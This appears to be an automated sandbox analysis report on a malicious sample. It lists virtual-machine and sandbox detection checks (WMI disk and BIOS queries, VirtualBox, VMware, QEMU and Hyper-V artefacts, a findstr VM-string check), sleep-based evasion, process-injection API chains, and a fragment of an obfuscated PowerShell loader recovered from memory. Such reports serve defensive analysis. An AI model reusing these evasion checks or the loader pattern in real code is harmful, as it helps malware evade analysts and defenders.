Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

40_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 38_2_00007FFB4B1036CD rdtsc

38_2_00007FFB4B1036CD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4466	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5416	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3213
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2339
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 416
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 366
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 375
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 361
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 357
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 351

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_40-15438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_37-246
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_40-18313
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_40-15444

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_40-15533

Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 4466 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 5416 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep count: 3295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep count: 2690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408	Thread sleep count: 3663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 2339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7208	Thread sleep count: 282 > 30
Source: C:\Windows\System32\dllhost.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1196	Thread sleep count: 416 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1196	Thread sleep time: -41600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5460	Thread sleep count: 366 > 30
Source: C:\Windows\System32\lsass.exe TID: 5460	Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5904	Thread sleep count: 375 > 30
Source: C:\Windows\System32\svchost.exe TID: 5904	Thread sleep time: -37500s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5200	Thread sleep count: 182 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832	Thread sleep count: 361 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832	Thread sleep time: -36100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4444	Thread sleep count: 357 > 30
Source: C:\Windows\System32\svchost.exe TID: 4444	Thread sleep time: -35700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104	Thread sleep count: 351 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104	Thread sleep time: -35100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4840	Thread sleep count: 348 > 30
Source: C:\Windows\System32\svchost.exe TID: 4840	Thread sleep time: -34800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2328	Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096	Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096	Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1992	Thread sleep count: 314 > 30
Source: C:\Windows\System32\svchost.exe TID: 1992	Thread sleep time: -31400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5648	Thread sleep count: 290 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1564	Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 3228	Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 7252	Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 916	Thread sleep count: 284 > 30
Source: C:\Windows\System32\svchost.exe TID: 2292	Thread sleep count: 282 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490D894 FindFirstFileExW,	20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CD894 FindFirstFileExW,	40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FD894 FindFirstFileExW,	40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175D894 FindFirstFileExW,	41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178D894 FindFirstFileExW,	41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DD894 FindFirstFileExW,	43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066D894 FindFirstFileExW,	45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_000002A3F066DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: cmd.exe, 00000013.00000003.1690937685.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699733753.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699263741.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D57F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys@
Source: cmd.exe, 00000013.00000003.1690901511.000001EBD53BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1691126167.000001EBD53B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1698911244.000001EBD53BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopadkCiysMmhjqykstcChuhrDPRCQvx=esblcks);'.RahNPlsXJhyfvTcQkBWktebzF= (PNNxp (blcALBQNoklYmnvMqIjuKZloxTIro=ktblckrblckeALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingArJZdvjpUptzBxvHvVzmRfwURGQDImiUiFepc=lckablckmblcarQbzXMlQaKmxQdurvXHJDiXfLrQbGJVpZM=t=[string[]]ARTcJFSmRhgHuSEVippzfFGXELhPNfdKWcEyxbe=;Invoke-ExpAryrEiMSvbpMzJYfBAYJTgXlvxSSZldHrVFEo= PNNxp($qgBgAyUllFfCWzKmBQZVLaccuQXnireOSWwpcmWKBmy=tblckrblckebbEqHxaAldzMVZchChAPefbpSXeULFu=.Replace('blBirtiNrHVYDUNOfnuwezvYlMeMCKv=stem.SecuritBjgLdjxLERRreRJOdBgCGHmjbhPayNZRJLtkQ=kSblckyblcksBjNaUJYFtDDvZOpjtVkkwMoujNYFxlirOvdn=rity.CryptogBjODtptiZVMnhNLphWGYLOGXSfg=blckoblckrblBlMwEAfmtMEkQJBhANdInPMKsfWGdzs=ckrblckyblckBwMSuWUxrcTzMwozeerirEuWggRE=.blckMblckebbWqwEcnSQuVPbgzZIJhpj='blck', '');BWTJwdXgkYrcJpKhsjetHrudPEdUWIhjstyHx=$BZwPR=[SystBwVSeyAtSDInBjVCzGYmiwZJzkKTSwkHCUgRSOz=$host.UI.RawbxsqEpkJRPGjAbsGsFwnyOiXVgw=blckBblckablcCOSJSjaMRRokVhPLqsQzLlRqUPu=Expression 'CCVdyswDTorbNVRsRbdOSu=.MblckeblckmCdIvahXCUGViOpDUSnzHcN=gJbXPg
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2B
Source: lsass.exe, 0000002A.00000000.2197017200.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2697105263.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2B
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
